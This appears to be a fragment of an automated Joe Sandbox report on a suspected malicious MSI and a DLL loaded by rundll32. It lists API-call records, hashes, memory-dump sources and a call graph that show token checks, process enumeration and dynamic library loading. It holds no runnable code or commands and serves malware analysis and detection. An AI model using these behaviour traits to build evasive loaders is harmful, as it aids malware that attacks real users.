                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConvertFreeLocalString
                                                                                                                                            • String ID: Invalid SID
                                                                                                                                            • API String ID: 3201929900-130637731
                                                                                                                                            • Opcode ID: 3bd76c1b4f76d2bc9b1d7958b6d0ac572959626d6dc8edd0ff51768f98ef5c67
                                                                                                                                            • Instruction ID: 924093284c0af9a0709b0e66c886d41ea255376f06c751093d3acefeca964672
                                                                                                                                            • Opcode Fuzzy Hash: 3bd76c1b4f76d2bc9b1d7958b6d0ac572959626d6dc8edd0ff51768f98ef5c67
                                                                                                                                            • Instruction Fuzzy Hash: C421AEB4A14609DBDB15CF58C855BBFBBF8FF44714F100A1DE501AB680D7BA6A048BD0
                                                                                                                                            APIs
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002F909B
                                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 002F90FE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                            • String ID: bad locale name
                                                                                                                                            • API String ID: 3988782225-1405518554
                                                                                                                                            • Opcode ID: d692e5745d1b16d491662b284fa02b44b9c8255e95f394634c059ce97469700d
                                                                                                                                            • Instruction ID: e0cc3850785b12d50f2222073f68e4344777f02e11a6c53f50ca78827739d9da
                                                                                                                                            • Opcode Fuzzy Hash: d692e5745d1b16d491662b284fa02b44b9c8255e95f394634c059ce97469700d
                                                                                                                                            • Instruction Fuzzy Hash: C921C070805B84DED722CFA8C90478BBFF4EF19710F14869EE4999B781D3B5A604CBA1
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_
                                                                                                                                            • String ID: false$true
                                                                                                                                            • API String ID: 2427045233-2658103896
                                                                                                                                            • Opcode ID: 434f537a23c1fb34bd53915acaff2bad26ef78639ca81f70cd63afe07f5e7172
                                                                                                                                            • Instruction ID: b1646d23916e074e711bd6bc5de5e0f9bb23e96518d1663bc6059656f73e4524
                                                                                                                                            • Opcode Fuzzy Hash: 434f537a23c1fb34bd53915acaff2bad26ef78639ca81f70cd63afe07f5e7172
                                                                                                                                            • Instruction Fuzzy Hash: 1511D075901749AFC722EFB4D841B9AB7F4AF09300F10C92AE5968B282EB30E505CB90
                                                                                                                                            APIs
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00300D30
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00300D8B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 593203224-1316489359
                                                                                                                                            • Opcode ID: 68c04522aa3e7ba2be674f42bfc1a1a0b72759a7a9655519d5133d464bfd35af
                                                                                                                                            • Instruction ID: 34b0180d9f29b69513e7a2123ac5c4e54c8c77e002d6b0b4100b8a7f06834641
                                                                                                                                            • Opcode Fuzzy Hash: 68c04522aa3e7ba2be674f42bfc1a1a0b72759a7a9655519d5133d464bfd35af
                                                                                                                                            • Instruction Fuzzy Hash: 1B019E35600608AFCB1ADF54C8A1A9E7BB9EF84350F150099E8059F3A1EB70FE40CBA0
                                                                                                                                            APIs
                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 003277AF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                            • String ID: 21$InitializeCriticalSectionEx
                                                                                                                                            • API String ID: 2593887523-1156534138
                                                                                                                                            • Opcode ID: fd92e301c391a9374325cf79c8c9b233a570b83353d68122ca9e514d47877359
                                                                                                                                            • Instruction ID: d94140da3ac511e112504168ed5a2cb626f508498169f47690c1859a94141bde
                                                                                                                                            • Opcode Fuzzy Hash: fd92e301c391a9374325cf79c8c9b233a570b83353d68122ca9e514d47877359
                                                                                                                                            • Instruction Fuzzy Hash: 3AE01236584228FBCB231F65EC89EDE7F29FB45761F004411FE1965160DBB28921DAD0
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Alloc
                                                                                                                                            • String ID: 21$FlsAlloc
                                                                                                                                            • API String ID: 2773662609-4108990562
                                                                                                                                            • Opcode ID: 46ce57caae1c74b42c0e24ac84c0eddfd8990bda1a4813e49d667f39c6fd8d47
                                                                                                                                            • Instruction ID: 7c5b4f2319f8745054f98beeb5b572ac4bea6407104a11d222710f4d19bd0bdd
                                                                                                                                            • Opcode Fuzzy Hash: 46ce57caae1c74b42c0e24ac84c0eddfd8990bda1a4813e49d667f39c6fd8d47
                                                                                                                                            • Instruction Fuzzy Hash: 08E0C23268833CF7C7232B61BC46DDEF908AF44B60F040021FE045A2909BA2888192D1
                                                                                                                                            APIs
                                                                                                                                            • FreeLibrary.KERNEL32(0034E428), ref: 00327932
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                            • String ID: (4$x4
                                                                                                                                            • API String ID: 3664257935-1919804628
                                                                                                                                            • Opcode ID: f62c333874ebdd3c7b80716b6e3cb93f24a002fab18049c6c6e785fce8c7b44d
                                                                                                                                            • Instruction ID: 5ee68e1cce922ef7d9afebb8d9571e58aab5c747b6a81bfc162ead40418f91a0
                                                                                                                                            • Opcode Fuzzy Hash: f62c333874ebdd3c7b80716b6e3cb93f24a002fab18049c6c6e785fce8c7b44d
                                                                                                                                            • Instruction Fuzzy Hash: CAE08C36C083259BEB331F09E804BA077D8BB60332F26022AD8EC162A093B12CD1C6D0
                                                                                                                                            APIs
                                                                                                                                            • LocalFree.KERNEL32(00000000,002F4261,00334400,000000FF,7642E7B1,00000000,?,00000000,?,?,?,00334400,000000FF,?,002F3A75,?), ref: 002F4096
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,40000022,7642E7B1,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 002F4154
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,3FFFFFFF,7642E7B1,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 002F4177
                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 002F4217
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Local$AllocFree
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2012307162-0
                                                                                                                                            • Opcode ID: adcce28dc6e073b97ba1403116772deb4f86ed4330362d8051ae9ae2130c0469
                                                                                                                                            • Instruction ID: d5aef409fcb8ecb27f06727063097af41d29f2ca6b41e6e6452ff1010bbd2a21
                                                                                                                                            • Opcode Fuzzy Hash: adcce28dc6e073b97ba1403116772deb4f86ed4330362d8051ae9ae2130c0469
                                                                                                                                            • Instruction Fuzzy Hash: AF5190B1A1020A9FDB18DF68C985ABEFBB5EB48340F14463DE925E7380D770A950CB50
                                                                                                                                            APIs
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 002F1E01
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 002F1E21
                                                                                                                                            • LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 002F1EA7
                                                                                                                                            • LocalFree.KERNEL32(00000001,7642E7B1,00000000,00000000,00333C40,000000FF,?,00000000), ref: 002F1F2D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Local$AllocFree
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2012307162-0
                                                                                                                                            • Opcode ID: 8eb57f5299ba9c46accee158cc4b0c6785a07e3209a355df4041523321e0d35e
                                                                                                                                            • Instruction ID: b37eea8ca28756f7ab5e3e9366bed8e0718c6c574dddc529e9a0527b11a482b8
                                                                                                                                            • Opcode Fuzzy Hash: 8eb57f5299ba9c46accee158cc4b0c6785a07e3209a355df4041523321e0d35e
                                                                                                                                            • Instruction Fuzzy Hash: 2E51F372A14219DFC716DF28DC80A6AF7E8FB49390F510A3EF916D7290DB30D9248B91

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:0.3%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:5.2%
                                                                                                                                            Total number of Nodes:582
                                                                                                                                            Total number of Limit Nodes:2
9474 18005cc2e 9472->9474 9476 180011160 51 API calls 9473->9476 9483 18000e1e0 9474->9483 9482 18005cb0c 9476->9482 9477 18005cc33 9479 18000e1e0 51 API calls 9477->9479 9478->9468 9480 18005cc39 9479->9480 9480->9468 9481 180011160 51 API calls 9481->9482 9482->9477 9482->9478 9482->9481 9484 1800d37a4 51 API calls 9483->9484 9485 18000e1f0 9484->9485 9486 1800dbd50 _invalid_parameter_noinfo_noreturn 49 API calls 9485->9486 9488 18000e22d 9485->9488 9487 18000e241 9486->9487 9487->9488 9489 1800dbd50 _invalid_parameter_noinfo_noreturn 49 API calls 9487->9489 9493 18000e291 9489->9493 9490 18000e3ff 9491 1800d5000 _invalid_parameter_noinfo_noreturn 7 API calls 9490->9491 9492 18000e503 9491->9492 9492->9477 9493->9490 9495 18000ec30 9493->9495 9497 18000ecbd 9495->9497 9501 18000ede8 9495->9501 9496 18000ba20 7 API calls 9503 18000ee70 9496->9503 9497->9497 9497->9501 9507 18000ba20 9497->9507 9499 1800d5000 _invalid_parameter_noinfo_noreturn 7 API calls 9500 18000f82c 9499->9500 9500->9490 9501->9496 9501->9503 9502 18000ba20 7 API calls 9506 18000ee74 9502->9506 9503->9503 9504 18000ba20 7 API calls 9503->9504 9505 18000efdc 9503->9505 9503->9506 9504->9505 9505->9502 9506->9499 9509 18000ba6d 9507->9509 9512 18000bb11 9507->9512 9508 1800d5000 _invalid_parameter_noinfo_noreturn 7 API calls 9510 18000bb4f 9508->9510 9509->9512 9513 18000b740 9509->9513 9510->9501 9512->9508 9516 18000b768 9513->9516 9514 1800d5000 _invalid_parameter_noinfo_noreturn 7 API calls 9515 18000ba09 9514->9515 9515->9509 9516->9514 8788 18001d410 8789 18001d4d0 8788->8789 8793 18001d43f 8788->8793 8791 18001d4e9 GetProcessHeap 8789->8791 8789->8793 8790 18001d449 8792 1800d56a4 3 API calls 8791->8792 8792->8793 8793->8790 8796 1800d56a4 8793->8796 8795 18001d4ba 8799 1800d5668 8796->8799 8798 1800d56ad 8798->8795 8800 1800d5682 8799->8800 8801 1800d567b 8799->8801 8803 1800ee950 8800->8803 8801->8798 8806 1800ee58c 8803->8806 8813 1800ed508 EnterCriticalSection 8806->8813 8808 1800ee5a8 
8809 1800ee604 VirtualAllocExNuma 8808->8809 8810 1800ee5b1 8809->8810 8811 1800ed568 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 8810->8811 8812 1800ee5ba 8811->8812 8812->8801 9380 18001d2d0 9381 18001d2e0 9380->9381 9382 1800d7ba8 Concurrency::cancel_current_task 2 API calls 9381->9382 9383 18001d2f1 9382->9383 8835 180001410 SetLastError 8836 180001010 8837 1800db884 8836->8837 8841 1800f0754 8837->8841 8862 1800eff24 8841->8862 8844 1800eff24 _Getctype 5 API calls 8845 1800f0793 8844->8845 8846 1800eff24 _Getctype 5 API calls 8845->8846 8847 1800f07b2 8846->8847 8848 1800eff24 _Getctype 5 API calls 8847->8848 8849 1800f07d1 8848->8849 8850 1800eff24 _Getctype 5 API calls 8849->8850 8851 1800f07f0 8850->8851 8852 1800eff24 _Getctype 5 API calls 8851->8852 8853 1800f080f 8852->8853 8854 1800eff24 _Getctype 5 API calls 8853->8854 8855 1800f082e 8854->8855 8856 1800eff24 _Getctype 5 API calls 8855->8856 8857 1800f084d 8856->8857 8858 1800eff24 _Getctype 5 API calls 8857->8858 8859 1800f086c 8858->8859 8860 1800eff24 _Getctype 5 API calls 8859->8860 8861 1800f088b 8860->8861 8863 1800eff81 8862->8863 8869 1800eff7c _Getctype 8862->8869 8863->8844 8864 1800effb1 LoadLibraryExW 8866 1800f0086 8864->8866 8867 1800effd6 GetLastError 8864->8867 8865 1800f00a6 GetProcAddress 8865->8863 8866->8865 8868 1800f009d FreeLibrary 8866->8868 8867->8869 8868->8865 8869->8863 8869->8864 8869->8865 8870 1800f0010 LoadLibraryExW 8869->8870 8870->8866 8870->8869 9384 180001ad0 9385 1800dc220 9384->9385 9386 1800f25bb 9385->9386 9387 1800f25b1 9385->9387 9389 1800f25c0 9386->9389 9395 1800f25c7 _Getctype 9386->9395 9397 1800eee04 9387->9397 9392 1800eedc8 __free_lconv_num 11 API calls 9389->9392 9390 1800f25cd 9393 1800dbe9c memcpy_s 11 API calls 9390->9393 9391 1800f25fa HeapReAlloc 9394 1800f25b9 9391->9394 9391->9395 9392->9394 9393->9394 9395->9390 9395->9391 9396 1800ed83c std::_Facet_Register 2 API calls 9395->9396 9396->9395 9398 1800eee4f 9397->9398 9403 1800eee13 
_Getctype 9397->9403 9399 1800dbe9c memcpy_s 11 API calls 9398->9399 9401 1800eee4d 9399->9401 9400 1800eee36 HeapAlloc 9400->9401 9400->9403 9401->9394 9402 1800ed83c std::_Facet_Register 2 API calls 9402->9403 9403->9398 9403->9400 9403->9402 9409 180001510 GetCurrentThread OpenThreadToken 9410 180001582 GetTokenInformation 9409->9410 9411 180001552 GetLastError 9409->9411 9414 1800015c8 GetLastError 9410->9414 9423 180001692 9410->9423 9412 18000157b __std_exception_copy 9411->9412 9413 18000155f GetCurrentProcess OpenProcessToken 9411->9413 9416 1800d5000 _invalid_parameter_noinfo_noreturn 7 API calls 9412->9416 9413->9410 9413->9412 9415 1800015de 9414->9415 9418 180001617 9415->9418 9419 1800015f0 GetTokenInformation 9415->9419 9417 18000170d 9416->9417 9420 180001630 AllocateAndInitializeSid 9418->9420 9418->9423 9419->9418 9419->9423 9420->9423 9424 18000166d 9420->9424 9421 1800016d1 FreeSid 9421->9412 9422 180001676 EqualSid 9422->9423 9422->9424 9423->9412 9423->9421 9424->9422 9424->9423 9517 1800011d0 9518 1800d505c std::_Facet_Register 51 API calls 9517->9518 9519 1800011e1 9518->9519 8871 18001f820 8872 18001f860 8871->8872 8873 18001f84e 8871->8873 8875 18001f881 LoadLibraryExW 8872->8875 8876 18001f86f 8872->8876 8873->8872 8882 18001f790 8873->8882 8877 18001f8a0 8875->8877 8878 18001f8d7 8877->8878 8879 18001f8b6 GetLastError 8877->8879 8880 18001f8be 8877->8880 8879->8880 8880->8878 8881 18001f8cf SetLastError 8880->8881 8881->8878 8883 18001f7a3 OutputDebugStringA 8882->8883 8884 18001f7b6 8882->8884 8883->8884 8885 18001f7c8 8884->8885 8888 18001f7ee 8884->8888 8889 18001f5c0 8884->8889 8887 18001f7e0 GetLastError 8885->8887 8885->8888 8887->8888 8888->8872 8890 18001f5ee 8889->8890 8899 18001f75d 8889->8899 8891 18001f5fc QueryActCtxW 8890->8891 8890->8899 8894 18001f637 8891->8894 8891->8899 8895 18001f664 GetModuleFileNameW 8894->8895 8894->8899 8902 18001f6f9 8894->8902 8896 18001f685 8895->8896 8895->8899 8897 18001f69c 8896->8897 8898 
18001f68c SetLastError 8896->8898 8901 18001f6e8 GetLastError 8897->8901 8897->8902 8898->8899 8903 1800d5000 8899->8903 8900 18001f74f LoadLibraryW 8900->8899 8901->8902 8902->8899 8902->8900 8904 1800d5009 8903->8904 8905 18001f781 8904->8905 8906 1800d50e0 IsProcessorFeaturePresent 8904->8906 8905->8885 8907 1800d50f8 8906->8907 8912 1800d52d8 8907->8912 8913 1800d52e9 8912->8913 8914 1800d52f2 VirtualAllocExNuma 8913->8914 8915 1800d5308 RtlVirtualUnwind 8914->8915 8916 1800d510b 8914->8916 8915->8914 8915->8916 8917 1800d50a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8916->8917 8920 1800014a0 GetTickCount 9404 1800012e0 InitializeCriticalSection 9428 180006920 9429 180006933 9428->9429 9430 180006929 9428->9430 9431 1800069ab 9429->9431 9435 180003c80 9429->9435 9432 180003c80 11 API calls 9431->9432 9434 1800069e8 9431->9434 9432->9434 9438 180003bb0 9435->9438 9439 180100220 9438->9439 9440 180003bec VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 9439->9440 9441 1800d5000 _invalid_parameter_noinfo_noreturn 7 API calls 9440->9441 9442 180003c6f 9441->9442 9442->9431
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000003.2257756805.00007DF4DD100000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4DD100000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_3_7df4dd100000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateSnapshotToolhelp32
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 3332741929-2766056989
                                                                                                                                            • Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                            • Instruction ID: c9ec7b5872f907cd43594026c22f1e08b0b7b9715ec2f75486b6cc4481903521
                                                                                                                                            • Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                            • Instruction Fuzzy Hash: 6071CD3161494D8FEB94EF58C858BAD37E5FB98315F104226E81EC72A0DB749954CB80
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000003.2168774337.00000293134B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000293134B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_3_293134b0000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d7e753f29fc521fa2d0b6c7a6994e588844e22f1070003091da851a212630d82
                                                                                                                                            • Instruction ID: e603c2adcafda4036e2caf7c6055458bf92d1742c850cdf020dab42ebc9b2872
                                                                                                                                            • Opcode Fuzzy Hash: d7e753f29fc521fa2d0b6c7a6994e588844e22f1070003091da851a212630d82
                                                                                                                                            • Instruction Fuzzy Hash: 64F0A470618B408BEB44DF1884CA63677E1FBD8755F24452EE889C7371CB359842CB83
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000003.2168774337.00000293134B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000293134B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_3_293134b0000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c03d8a45eb9b0d3ccc835ff03553e770b46152858ebd01b16508ffef1a6f20c3
                                                                                                                                            • Instruction ID: 7ead1ce74da6b064b80a89ebe7293795d446223bf9d178df3ae45fb7facb266e
                                                                                                                                            • Opcode Fuzzy Hash: c03d8a45eb9b0d3ccc835ff03553e770b46152858ebd01b16508ffef1a6f20c3
                                                                                                                                            • Instruction Fuzzy Hash: A9F05470A28F444BDB48EF2C884A63577D1F7A8645F54453EA448C7361DF35E5428B43

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocNumaVirtual
                                                                                                                                            • String ID: ,=$0m8B$2cc)$@$m)S9$pZ5u
                                                                                                                                            • API String ID: 4233825816-2795462132
                                                                                                                                            • Opcode ID: ea224779a45d07559d73cbc71cfa124f413c696b979030cadcaad53e6331c73d
                                                                                                                                            • Instruction ID: 26dc1e36989902e02d5f08e91251171354dcc459b97bff11772d218079fe3606
                                                                                                                                            • Opcode Fuzzy Hash: ea224779a45d07559d73cbc71cfa124f413c696b979030cadcaad53e6331c73d
                                                                                                                                            • Instruction Fuzzy Hash: 231159727102885DE7618FB5E44479D3BA0F328BA8F54422A9A6D67BD4DA38C60ECB14
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000003.2257756805.00007DF4DD100000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4DD100000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_3_7df4dd100000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1083639309-0
                                                                                                                                            • Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                            • Instruction ID: bc8234dab0e77f46646fe052733c1672029c0de449a4d848e29ee2c6f10be317
                                                                                                                                            • Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                            • Instruction Fuzzy Hash: DE21B83065495D8FEBA1EB9CCC58BEE33F5EBA8310F404226941EDB294DE35AA448750
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000003.2168774337.00000293134B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000293134B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_3_293134b0000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                            • Opcode ID: e1b5f217ab961a454b36722efd1ce63e8d0791c74eab14a614d4f9e3fc2a9a33
                                                                                                                                            • Instruction ID: 000be774d9cfe32d78eb128b8dda6673e26440be64146405b8c73bca796068e9
                                                                                                                                            • Opcode Fuzzy Hash: e1b5f217ab961a454b36722efd1ce63e8d0791c74eab14a614d4f9e3fc2a9a33
                                                                                                                                            • Instruction Fuzzy Hash: 27B1713121CA088FDF54EF1CD889B9AB7E1FB98310F404669E48DC7265DB34E945CB86

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
